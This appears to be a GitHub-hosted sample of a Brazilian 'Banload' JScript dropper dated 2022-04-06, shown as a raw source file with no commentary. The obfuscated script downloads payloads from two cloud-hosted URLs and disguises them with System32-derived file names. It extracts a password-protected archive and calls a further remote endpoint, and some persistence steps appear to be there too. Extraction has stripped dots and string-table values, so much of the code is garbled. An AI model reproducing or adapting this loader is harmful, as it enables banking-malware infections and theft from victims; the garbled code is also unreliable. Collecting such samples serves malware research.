-
Notifications
You must be signed in to change notification settings - Fork 6
/
2022-04-06_Banload_MSI_BR
75 lines (75 loc) · 3.33 KB
/
2022-04-06_Banload_MSI_BR
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
var _
function HowIsBigDickToYoungers(l)
{
var m= new Date();//2
var j=0;//3
while(j< (l* 1000))
{
var k= new Date();//5
var j=k[_"["]()- m[_"["]()
}
}
function yiiufyrguyhdvhudsgfuvchydfuysdybfgusdyfbgusdygfsud(param)
{
var h=_""";
var g=_"g";
for(var f=0;f< param;f++)
{
h+= g[_"i"](Math[_"T"](Math[_"e"]()* g[_"t"]))
}
return h
}
var _FGettoSplitData;
_FGettoSplitData= _"m";function downyJr(d,c)
{
var b;
var a;
try
{
var e= new ActiveXObject(_"e");//30
e[_"""](30000,30000,30000,5000);void((e[_"""](_",",d,false)));e[_"""]();if(e[_","]== 404)
{
return false
}
b= e[_"""]
}
catch(ex)
{
return false
}
//28
a= new ActiveXObject(_"A");a[_"B"]= 1;a[_"""]();a[_"C"](b);a[_"D"](c,2);a[_"E"]();return true
}
var objFSO = new ActiveXObject("ScriptingFileSystemObject");
var _0x6f626a466f6c646572 = objFSOGetFolder("C:\\Windows\\System32");
var _0x636f6c46696c6573 = _0x6f626a466f6c646572Files;
var _0x73747246696c654e616d65 = [];
for(var _0x6f626a456e756d = new Enumerator(_0x636f6c46696c6573); !_0x6f626a456e756datEnd(); _0x6f626a456e756dmoveNext()) {aux = _0x6f626a456e756ditem().Namereplace("@", "").replace("-", "").replace(" ","");if (auxindexOf('.dll') !== -1 || auxindexOf('.exe') !== -1){_0x73747246696c654e616d65push(auxslice(0, -4));}}
var unicohsajke=_0x73747246696c654e616d65[Mathfloor(Mathrandom() * (_0x73747246696c654e616d65length - 1) + 1)] + yiiufyrguyhdvhudsgfuvchydfuysdybfgusdyfbgusdygfsud(3);//59
var uniqueDash=_0x73747246696c654e616d65[Mathfloor(Mathrandom() * (_0x73747246696c654e616d65length - 1) + 1)];
var codersshell_exc= new ActiveXObject(_"F");//60
var usuario_prof_varts=codersshell_exc[_"H"](_"G")+"\"+ _0x73747246696c654e616d65[Mathfloor(Mathrandom() * (_0x73747246696c654e616d65length - 1) + 1)];//61
var dskp_textoUni=_"L";//62
var meuOBJvar= new ActiveXObject(_"M");//64
var coders= new ActiveXObject(_"F");//60
var _prof_varts=coders[_"H"](_"J")+"\"+ _"L";
var oShell = new ActiveXObject("WScriptShell");
var comp=oShellExpandEnvironmentStrings("%USERPROFILE%") +'\'+ _"L";
var complexRsa= "https://toystorehuewjir2341234norwayeastcloudappazurecom/Plutao/rftwcv";
if(meuOBJvar[_"N"](comp))
{} else
{
try
{
var txt= new ActiveXObject(_"M");//74
var s=txt[_"P"](codersshell_exc[_"O"](_"G")+ _"L",true);//75
s[_"R"](_"Q");s[_"E"]()
}catch(ex){}//72
var _qoiwehiandhfisdufhiuhubsdiu="123456ze";
var gdfijuoiuyqkhjghfvo8wkjghfv= new ActiveXObject(_"M");//82
gdfijuoiuyqkhjghfvo8wkjghfv[_"S"](usuario_prof_varts);HowIsBigDickToYoungers(1);downyJr(_FGettoSplitData,usuario_prof_varts+ _"T"+ unicohsajke+ _"U");HowIsBigDickToYoungers(5); downyJr(complexRsa,usuario_prof_varts+ _"T"+uniqueDash+ _"a"); HowIsBigDickToYoungers(2)
oShellrun(usuario_prof_varts+ _"T"+ uniqueDash+ _"a"+" x "+ usuario_prof_varts+ _"T"+ unicohsajke+ _"U"+" -o"+usuario_prof_varts +" -p"+_qoiwehiandhfisdufhiuhubsdiu,0,true);
HowIsBigDickToYoungers(2);gdfijuoiuyqkhjghfvo8wkjghfv[_"b"](usuario_prof_varts+ _"Z",usuario_prof_varts+ _"T"+ unicohsajke+ _"a");var colocando_starting=usuario_prof_varts+ _"T"+ unicohsajke+ _"a";//100
var btcadacoins= new ActiveXObject(_"f");//102
var _df57d583561c25884ae7c8c4df319ad = new ActiveXObject("WinHttpWinHttpRequest51"); _df57d583561c25884ae7c8c4df319adopen("GET","https://filtrosefioseletricosdeastuscloudappazurecom/ipreverso/verrtjklopiuyrfgfrphp", false); btcadacoins[_"i"](_"g"+ colocando_starting+ _"h"); _df57d583561c25884ae7c8c4df319adsend();
}